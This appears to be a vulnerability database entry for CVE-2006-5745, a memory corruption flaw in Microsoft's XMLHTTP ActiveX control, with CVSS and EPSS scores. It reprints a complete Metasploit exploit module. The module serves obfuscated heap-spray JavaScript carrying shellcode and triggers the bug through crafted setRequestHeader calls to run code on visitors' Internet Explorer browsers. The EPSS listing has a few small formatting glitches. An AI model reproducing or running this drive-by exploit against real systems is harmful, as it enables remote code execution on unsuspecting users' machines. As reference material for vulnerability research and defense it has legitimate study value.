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Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information.
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V2
7.6
AV:N/AC:H/Au:N/C:C/I:C/A:C
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EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
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EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
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89.83%
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2023-03-12
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97.2%
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2023-04-16
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97.37%
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2023-05-21
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97.28%
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2023-07-02
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97.1%
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2023-08-06
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97.36%
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2023-09-10
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97.39%
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2023-10-22
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97.38%
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2023-11-26
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97.14%
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2024-01-07
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97.04%
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2024-03-31
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97.16%
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2024-06-02
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97.16%
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2024-07-14
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97.12%
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2024-09-29
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97.22%
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2024-12-22
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97.24%
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2025-01-19
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97.24%
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2025-03-18
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86.69%
2025-03-30
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87.18%
2025-03-30
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87.18,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# $Id: ms06_071_xml_core.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer XML Core Services HTTP Request Handling',
'Description' => %q{
This module exploits a code execution vulnerability in Microsoft XML Core Services which
exists in the XMLHTTP ActiveX control. This module is the modifed version of
http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully
tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6
+ Microsoft XML Core Services 4.0 SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Trirat Puttaraksa <trir00t [at] gmail.com>',
],
'Version' => '$Revision: 9669 $',
'References' =>
[
['CVE', '2006-5745' ],
['OSVDB', '29425' ],
['MSB', 'MS06-071' ],
['BID', '20915' ],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 -> Windows 2003 SP0', {'Ret' => 0x0c0c0c0c} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 10 2006'))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Get a unicode friendly version of the return address
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
# Randomize the javascript variable names
var_buffer = rand_text_alpha(rand(30)+2)
var_shellcode = rand_text_alpha(rand(30)+2)
var_unescape = rand_text_alpha(rand(30)+2)
var_x = rand_text_alpha(rand(30)+2)
var_i = rand_text_alpha(rand(30)+2)
var_size = rand_text_alpha(rand(30)+2)
var_nopsize = rand_text_alpha(rand(30)+2)
var_limit = rand_text_alpha(rand(30)+2)
var_obj = rand_text_alpha(rand(30)+2)
var_id = rand_text_alpha(rand(30)+2)
# Build out the message
content = %Q|
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=#{var_id} classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}">
</object>
<script>
var #{var_unescape} = unescape ;
var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
var #{var_size} = #{var_shellcode}.length * 2;
var #{var_nopsize} = 0x400000 - (#{var_size} + 0x38);
var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
while (#{var_buffer}.length * 2 < #{var_nopsize}) #{var_buffer}+=#{var_buffer} ;
#{var_limit} = (0x12000000 - 0x400000) / 0x400000;
var #{var_x} = new Array() ;
for ( var #{var_i} =0 ; #{var_i} < #{var_limit} ; #{var_i}++ ) {
#{var_x}[ #{var_i} ] =
#{var_buffer} + #{var_shellcode};
}
var #{var_obj} = null;
#{var_obj} = document.getElementById('#{var_id}').object;
try {
#{var_obj}.open(new Array(), new Array(), new Array(), new Array(), new Array());
} catch(e) {};
#{var_obj}.open(new Object(), new Object(), new Object(), new Object(), new Object());
#{var_obj}.setRequestHeader( new Object(), '......' );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
</script>
</body>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end